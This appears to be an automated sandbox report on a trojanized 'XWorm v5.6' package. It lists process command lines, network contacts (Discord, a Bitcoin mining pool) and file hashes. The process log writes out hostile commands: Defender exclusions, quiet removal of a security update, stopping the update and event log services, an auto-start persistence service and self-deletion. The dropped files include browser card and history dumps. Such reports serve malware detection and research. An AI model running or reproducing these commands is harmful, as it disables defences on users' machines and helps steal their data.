C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\System32\Wbem\wmic.exe

wmic cpu get Name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /F "C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe""

C:\Windows\system32\PING.EXE

ping localhost -n 3

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "MCDRJPTJ"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "MCDRJPTJ" binpath= "C:\ProgramData\Xworm_Bypass.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "MCDRJPTJ"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\Xworm_Bypass.exe

C:\ProgramData\Xworm_Bypass.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

dialer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 24.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 104.26.13.205:443 api.ipify.org tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 eu.ss.btc.com udp
US 172.65.252.207:1800 eu.ss.btc.com tcp
US 8.8.8.8:53 207.252.65.172.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe

MD5 d626f885874892781aa6efcc7e0c2a69
SHA1 09f2aeab8f4618f26471261a746bad43bfc917ff
SHA256 df512cabbda87f7630eaa05abce3b84698a00a36d41222a95649f851d3317a1f
SHA512 26695528d81a1cf737d9337f11ca29fcbb7defb0418002e955501d7048c597cf23330be7bc49d33eceead020eb3a3e752d6a6c048ee54aa23c9e1981a520aa63

memory/1524-20-0x00007FF9DB143000-0x00007FF9DB145000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe

MD5 cbf264fda371ab41dccd5e100b59a2cb
SHA1 b0cea8c96cd73b6b085f5ef59ea820b120053754
SHA256 6e330ee9b36579c504acb6485d5be7e9a529713ca70e83fe15cfb36bc76584ed
SHA512 f2af35828d2074c3325eeb8fc0e0694fcbcdd844be630c0fa292276a32f2ec99eb599f9f035ba33204df31f4a368f248c60f35f2cf1df3eb929fe49cf77e6b7e

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe

MD5 fdd34dc8e5f2c59153cea0c37646ca8d
SHA1 7e8965a1bbd74f8f999f4dd94a66f9d240b8c7ab
SHA256 99704a3fbd648ef8449232da2768920ac86345939d789d918150fa52d72c1d7e
SHA512 980da4844bc0a2434978d9477b850198eab8fdd8f4272abcd50a2df3ef6a7d73f5d3928a73d747e67a15cf0ec9cd6b285df3bcf0b796536f34fe343701f82007

memory/1524-117-0x0000025D951A0000-0x0000025D96A58000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI14522\python312.dll

MD5 2889fb28cd8f2f32997be99eb81fd7eb
SHA1 adfeb3a08d20e22dde67b60869c93291ca688093
SHA256 435430e3abfde589d8535bc24a4b1d4147a4971dbe59e9377603974c07a1b637
SHA512 aaa33b8178a8831008ea6ad39b05189d55aa228a20a2315e45df6e2ff590c94478cfc76c9adb762689edb021ecdf98df3e7074d8d65c1c477273056b7509f8ee

C:\Users\Admin\AppData\Local\Temp\_MEI14522\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/4176-126-0x00007FF9D93A0000-0x00007FF9D9A79000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI14522\base_library.zip

MD5 630153ac2b37b16b8c5b0dbb69a3b9d6
SHA1 f901cd701fe081489b45d18157b4a15c83943d9d
SHA256 ec4e6b8e9f6f1f4b525af72d3a6827807c7a81978cb03db5767028ebea283be2
SHA512 7e3a434c8df80d32e66036d831cbd6661641c0898bd0838a07038b460261bf25b72a626def06d0faa692caf64412ca699b1fa7a848fe9d969756e097cba39e41

memory/1524-128-0x0000025DB16A0000-0x0000025DB1894000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_bz2.pyd

MD5 f991618bfd497e87441d2628c39ea413
SHA1 98819134d64f44f83a18985c2ec1e9ee8b949290
SHA256 333c06fad79094d43465d128d68078296c925d1ea2b6b5bf13072a8d5cb65e7e
SHA512 3a9ecb293abedcdba3493feb7d19f987735ced5a5194abaa1d1e00946e7ea0f878dd71868eb3d9bfec80432df862367661b825c9e71409c60ec73d1708a63ef6

C:\Users\Admin\AppData\Local\Temp\_MEI14522\libffi-8.dll

MD5 bb1feaa818eba7757ada3d06f5c57557
SHA1 f2de5f06dc6884166de165d34ef2b029bb0acf8b
SHA256 a7ac89b42d203ad40bad636ad610cf9f6da02128e5a20b8b4420530a35a4fb29
SHA512 95dd1f0c482b0b0190e561bc08fe58db39fd8bb879a2dec0cabd40d78773161eb76441a9b1230399e3add602685d0617c092fff8bf0ab6903b537a9382782a97

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_lzma.pyd

MD5 f07f0cfe4bc118aebcde63740635a565
SHA1 44ee88102830434bb9245934d6d4456c77c7b649
SHA256 cc5302895aa164d5667d0df3ebeeee804384889b01d38182b3f7179f3c4ff8c0
SHA512 fcd701903ccd454a661c27835b53f738d947f38e9d67620f52f12781a293e42ae6b96c260600396883d95dd5f536dba2874aaee083adbcc78d66873cefc8e99d

memory/4176-143-0x00007FF9EEA70000-0x00007FF9EEA9D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_wmi.pyd

MD5 f3767430bbc7664d719e864759b806e4
SHA1 f27d26e99141f15776177756de303e83422f7d07
SHA256 787caad25cb4e2df023ead5e5a3fcd160b1c59a2e4ae1fc7b25c5087964defe8
SHA512 b587dfff4ba86142663de6ef8710ac7ab8831ca5fc989820b6a197bcd31ac5fdcb0b5982bf9a1fc13b331d0e53dc1b7367b54bb47910f3d1e18f8193449acb9c

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_queue.pyd

MD5 8347192a8c190895ec8806a3291e70d9
SHA1 0a634f4bd15b7ce719d91f0c1332e621f90d3f83
SHA256 b1ad27547e8f7ab2d1ce829ca9bdcc2b332dc5c2ef4fe224ccb76c78821c7a19
SHA512 de6858ed68982844c405ca8aecf5a0aa62127807b783a154ba5d844b44f0f8f42828dc097ac4d0d1aa8366cdcab44b314effcb0020b65db4657df83b1b8f5fed

C:\Users\Admin\AppData\Local\Temp\_MEI14522\select.pyd

MD5 c16b7b88792826c2238d3cf28ce773dd
SHA1 198b5d424a66c85e2c07e531242c52619d932afa
SHA256 b81be8cc053734f317ff4de3476dd8c383cc65fe3f2f1e193a20181f9ead3747
SHA512 7b1b2494fe0ef71869072d3c41ba1f2b67e3b9dcc36603d1503bb914d8b8e803dc1b66a3cbf0e45c43e4a5b7a8f44504a35d5e8e1090d857b28b7eba1b89c08a

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_socket.pyd

MD5 7e92d1817e81cbafdbe29f8bec91a271
SHA1 08868b9895196f194b2e054c04edccf1a4b69524
SHA256 19573ccc379190277674a013f35bf055f6dbb57adfce79152152a0de3ff8c87c
SHA512 0ed41a3ce83b8f4a492555a41881d292ece61d544f0a4df282f3cc37822255a7a32647724568c9a3b04d13fd3cc93eb080e54ac2ce7705b6b470454366be1cbe

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_uuid.pyd

MD5 7a00ff38d376abaaa1394a4080a6305b
SHA1 d43a9e3aa3114e7fc85c851c9791e839b3a0ee13
SHA256 720e9b68c41c8d9157865e4dd243fb1731f627f3af29c43250804a5995a82016
SHA512 ce39452df539eeeff390f260c062a0c902557fda25a7be9a58274675b82b30bddb7737b242e525f7d501db286f4873b901d94e1cd09aa8864f052594f4b34789

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_ssl.pyd

MD5 8696f07039706f2e444f83bb05a65659
SHA1 6c6fff6770a757e7c4b22e6e22982317727bf65b
SHA256 5405af77bc6ad0c598490b666c599c625195f7bf2a63db83632e3a416c73e371
SHA512 93e9f8fc1ae8a458eb4d9e7d7294b5c2230cb753386842e72d07cb7f43f248d204d13d93aedae95ec1a7aa6a81a7c09fdba56a0bc31924a1722c423473d97758

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_sqlite3.pyd

MD5 29a6551e9b7735a4cb4a61c86f4eb66c
SHA1 f552a610d64a181b675c70c3b730aa746e1612d0
SHA256 78c29a6479a0a2741920937d13d404e0c69d21f6bd76bdfec5d415857391b517
SHA512 54a322bfe5e34f0b6b713e22df312cfbde4a2b52240a920b2fa3347939cf2a1fecbeac44d7c1fa2355ee6dc714891acd3ee827d73131fd1e39fba390c3a444e6

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_overlapped.pyd

MD5 ed9cff0d68ba23aad53c3a5791668e8d
SHA1 a38c9886d0de7224e36516467803c66a2e71c7d9
SHA256 e88452d26499f51d48fe4b6bd95fc782bad809f0cb009d249aacf688b9a4e43f
SHA512 6020f886702d9ff6530b1f0dad548db6ad34171a1eb677cb1ba14d9a8943664934d0cfe68b642b1dd942a70e3ae375071591a66b709c90bd8a13303a54d2198b

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_multiprocessing.pyd

MD5 0c942dacb385235a97e373bdbe8a1a5e
SHA1 cf864c004d710525f2cf1bec9c19ddf28984ca72
SHA256 d5161d4e260b2bb498f917307f1c21381d738833efc6e8008f2ebfb9447c583b
SHA512 ca10c6842634cec3cada209b61dd5b60d8ea63722e3a77aa05e8c61f64b1564febe9612b554a469927dbce877b6c29c357b099e81fa7e73ceeae04b8998aa5a5

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_hashlib.pyd

MD5 caaea46ee25211cbdc762feb95dc1e4d
SHA1 1f900cc99c02f4300d65628c1b22ddf8f39a94d4
SHA256 3ef6e0e5bf3f1ea9713f534c496a96eded9d3394a64324b046a61222dab5073b
SHA512 68c2b1634fcca930c1651f550494a2ef187cf52dce8ff28f410ebed4d84487e3b08f6f70223a83b5313c564dcd293748f3c22f2a4218218e634e924c8390cf9a

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_decimal.pyd

MD5 c2f5d61323fb7d08f90231300658c299
SHA1 a6b15204980e28fc660b5a23194348e6aded83fc
SHA256 a8ea1e613149d04e7ce637413aad6df636556916902718f64e57fdff44f959bb
SHA512 df22676b5268175562574078459820f11eedb06f2845c86398c54861e9e3fb92547e7341b497fb0e79e9d3abba655e6593b1049bf78818c0ba7b9c96e3748606

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_cffi_backend.cp312-win_amd64.pyd

MD5 886da52cb1d06bd17acbd5c29355a3f5
SHA1 45dee87aefb1300ec51f612c3b2a204874be6f28
SHA256 770d04ebe9f4d8271659ba9bf186b8ae422fdd76f7293dbc84be78d9d6dd92cc
SHA512 d6c7a90b8fa017f72f499943d73e4015f2eec0e46188c27848892a99be35e0ecbda1f692630863b89109b04636e813ddad2051f323a24b4d373192a6b67cf978

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_asyncio.pyd

MD5 b72e9a2f4d4389175e96cd4086b27aac
SHA1 2acfa17bb063ee9cf36fadbac802e95551d70d85
SHA256 f9924bbead1aca98422ba421f5139a4c147559aae5928dfd2f6aada20cb6bb42
SHA512 b55f40451fa9bdd62c761823613fcfe734aaa28e26fb02a9620ad39ab7539c9257eac8cc10d4a3f2390c23a4d951cc02d695498530a4c1d91b4e51e625316e06

C:\Users\Admin\AppData\Local\Temp\_MEI14522\VCRUNTIME140_1.dll

MD5 f8dfa78045620cf8a732e67d1b1eb53d
SHA1 ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256 a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512 ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

memory/4176-170-0x00007FF9EEC90000-0x00007FF9EEC9D000-memory.dmp

memory/4176-169-0x00007FF9EF370000-0x00007FF9EF37D000-memory.dmp

memory/4176-168-0x00007FF9EF190000-0x00007FF9EF1A9000-memory.dmp

memory/4176-167-0x00007FF9F0910000-0x00007FF9F091D000-memory.dmp

memory/4176-172-0x00007FF9EBB70000-0x00007FF9EBBA3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI14522\unicodedata.pyd

MD5 4253cde4d54e752ae54ff45217361471
SHA1 06aa069c348b10158d2412f473c243b24d6fc7bc
SHA256 67634e2df60da6b457e4ebfbae3edb1f48d87752221600a5814b5e8f351166e6
SHA512 3b714a57747eddf39fc3a84ab3ca37cc0b8103dd3f987331ffb2d1d46f9a34f3793bb0493c55e02ab873314c8990eaebdd0284ad087a651c06a7f862b1a61c80

C:\Users\Admin\AppData\Local\Temp\_MEI14522\sqlite3.dll

MD5 8776a7f72e38d2ee7693c61009835b0c
SHA1 677a127c04ef890e372d70adc2ab388134753d41
SHA256 c467fcc7377b4a176e8963f54ffff5c96d1eb86d95c4df839af070d6d7dbf954
SHA512 815bf905fa9a66c05e5c92506d2661c87559c6205c71daa205368dbfd3d56b8a302a4d31729bc6d4c1d86cbcf057638aa17bde0d85ccc59ce1cbcb9e64349732

C:\Users\Admin\AppData\Local\Temp\_MEI14522\pyexpat.pyd

MD5 edcb8f65306461e42065ac6fc3bae5e7
SHA1 4faa04375c3d2c2203be831995403e977f1141eb
SHA256 1299da117c98d741e31c8fb117b0f65ae039a4122934a93d0bbb8dfbddd2dcd7
SHA512 221e6e1eb9065f54a48040b48f7b6109853306f04506ccf9ecb2f5813a5bd9675c38565a59e72770bf33d132977aa1558cc290720e39a4f3a74a0e7c2a3f88fa

C:\Users\Admin\AppData\Local\Temp\_MEI14522\libssl-3.dll

MD5 9b8d3341e1866178f8cecf3d5a416ac8
SHA1 8f2725b78795237568905f1a9cd763a001826e86
SHA256 85dd8c17928e78c20cf915c1985659fe99088239793f2bd46acb31a3c344c559
SHA512 815abc0517f94982fc402480bba6e0749f44150765e7f8975e4fcbfce62c4a5ff741e39e462d66b64ba3b804bd5b7190b67fff037d11bb314c7d581cfa6097a8

C:\Users\Admin\AppData\Local\Temp\_MEI14522\libcrypto-3.dll

MD5 e68a459f00b05b0bd7eafe3da4744aa9
SHA1 41565d2cc2daedd148eeae0c57acd385a6a74254
SHA256 3fcf6956df6f5dc92b2519062b40475b94786184388540a0353f8a0868413648
SHA512 6c4f3747af7be340a3db91e906b949684a39cafc07f42b9fcc27116f4f4bf405583fc0db3684312b277d000d8e6a566db2c43601fa2af499700319c660ef1108

memory/4176-142-0x00007FF9F0920000-0x00007FF9F0939000-memory.dmp

memory/4176-138-0x00007FF9F4060000-0x00007FF9F406F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_ctypes.pyd

MD5 76288ffffdce92111c79636f71b9bc9d
SHA1 15c10dcd31dab89522bf5b790e912dc7e6b3183b
SHA256 192cc2ac818c78cd21e9f969a95c0ff777d4cd5f79ae51ab7c366d2b8540f6a1
SHA512 29efc143cd72bf886e9bf54463706484f22222f024bd7e8cb206c32f40b76d823efd36061b05bbd6bcf562f83d95449acb3f1440c95e63750c643c15a10816c9

C:\Users\Admin\AppData\Local\Temp\_MEI14522\python3.dll

MD5 6271a2fe61978ca93e60588b6b63deb2
SHA1 be26455750789083865fe91e2b7a1ba1b457efb8
SHA256 a59487ea2c8723277f4579067248836b216a801c2152efb19afee4ac9785d6fb
SHA512 8c32bcb500a94ff47f5ef476ae65d3b677938ebee26e80350f28604aaee20b044a5d55442e94a11ccd9962f34d22610b932ac9d328197cf4d2ffbc7df640efba

memory/4176-176-0x00007FF9D5860000-0x00007FF9D592D000-memory.dmp

memory/4176-137-0x00007FF9F2D40000-0x00007FF9F2D65000-memory.dmp

memory/4176-178-0x000001CB8A300000-0x000001CB8A829000-memory.dmp

memory/4176-177-0x00007FF9D2660000-0x00007FF9D2B89000-memory.dmp

memory/4176-180-0x00007FF9EBB50000-0x00007FF9EBB66000-memory.dmp

memory/4176-183-0x00007FF9EB840000-0x00007FF9EB852000-memory.dmp

memory/4176-184-0x00007FF9EB800000-0x00007FF9EB835000-memory.dmp

memory/1524-187-0x00007FF9DB143000-0x00007FF9DB145000-memory.dmp

memory/4176-188-0x00007FF9EB7D0000-0x00007FF9EB7F4000-memory.dmp

memory/1524-192-0x0000025DB2410000-0x0000025DB3038000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI14522\psutil\_psutil_windows.pyd

MD5 d2ab09582b4c649abf814cdce5d34701
SHA1 b7a3ebd6ff94710cf527baf0bb920b42d4055649
SHA256 571115cca942bc76010b379df5d28afcb0f0d0de65a3bac89a95c6a86838b983
SHA512 022ccaeb99dc08997d917f85c6bc3aefdad5074c995008942a2f35f46ba07d73bb5bc7bc971ec71cb0e60dcb096b2c990866fe29c57670d069e7bdc3b14f6172

C:\Users\Admin\AppData\Local\Temp\_MEI14522\charset_normalizer\md__mypyc.cp312-win_amd64.pyd

MD5 4e5cd67d83f5226410ef9f5bc6fddab9
SHA1 dd75f79986808ff22f1049680f848a547ba7ab84
SHA256 80645609f9a48a8aaf988fa667f5aa32445e32f8027f61b27884d738ad608ae4
SHA512 e52eb7b51562a336c73c6b5b8a1ae821a7c2ad0145633858fc78d6af1a27d8f57ba59cfffa84a376f59d5362a19a7cc09fa1f691c7b50b3ac27c439781a42ba0

memory/4176-205-0x00007FF9D55C0000-0x00007FF9D56DB000-memory.dmp

memory/4176-203-0x00007FF9EB4D0000-0x00007FF9EB4F7000-memory.dmp

memory/4176-208-0x00007FF9EB420000-0x00007FF9EB42C000-memory.dmp

memory/4176-207-0x00007FF9EB4B0000-0x00007FF9EB4BB000-memory.dmp

memory/4176-206-0x00007FF9EB4C0000-0x00007FF9EB4CB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI14522\Cryptodome\Cipher\_raw_ecb.pyd

MD5 1a48e6e2a3243a0e38996e61f9f61a68
SHA1 488a1aa38cd3c068bdf24b96234a12232007616c
SHA256 c7b01a0290bc43910ee776bd90de05e37b77f5bd33feaf7d38f4c362e255e061
SHA512 d7acd779b7cab5577289511f137dc664966fcaac39748e33ca4d266a785b17766106944df21c8f2452fd28e008529f3e0097282ad3c69f1069a93df25c6da764

C:\Users\Admin\AppData\Local\Temp\_MEI14522\charset_normalizer\md.cp312-win_amd64.pyd

MD5 21898e2e770cb9b71dc5973dd0d0ede0
SHA1 99de75d743f6e658a1bec52419230690b3e84677
SHA256 edd490bec8ec903cdbf62f39e0675181e50b7f1df4dc48a3e650e18d19804138
SHA512 dc8636d817ae1199200c24ac22def5d12642db951b87f4826015fd1d5c428d45410ce3b7f5bb5aaaa05deecf91d954b948f537bd6fa52a53364ab3609caac81d

C:\Users\Admin\AppData\Local\Temp\MO2gs8XTiO\Browser\cc's.txt

MD5 5aa796b6950a92a226cc5c98ed1c47e8
SHA1 6706a4082fc2c141272122f1ca424a446506c44d
SHA256 c4c83da3a904a4e7114f9bd46790db502cdd04800e684accb991cd1a08ee151c
SHA512 976f403257671e8f652bf988f4047202e1a0fd368fdb2bab2e79ece1c20c7eb775c4b3a8853c223d4f750f4192cd09455ff024918276dc1dd1442fa3b36623ad

C:\Users\Admin\AppData\Local\Temp\MO2gs8XTiO\Browser\history.txt

MD5 5638715e9aaa8d3f45999ec395e18e77
SHA1 4e3dc4a1123edddf06d92575a033b42a662fe4ad
SHA256 4db7f6559c454d34d9c2d557524603c3f52649c2d69b26b6e8384a3d179aeae6
SHA512 78c96efab1d941e34d3137eae32cef041e2db5b0ebbf883e6a2effa79a323f66e00cfb7c45eb3398b3cbd0469a2be513c3ff63e5622261857eefc1685f77f76b

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_023e02zr.mar.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
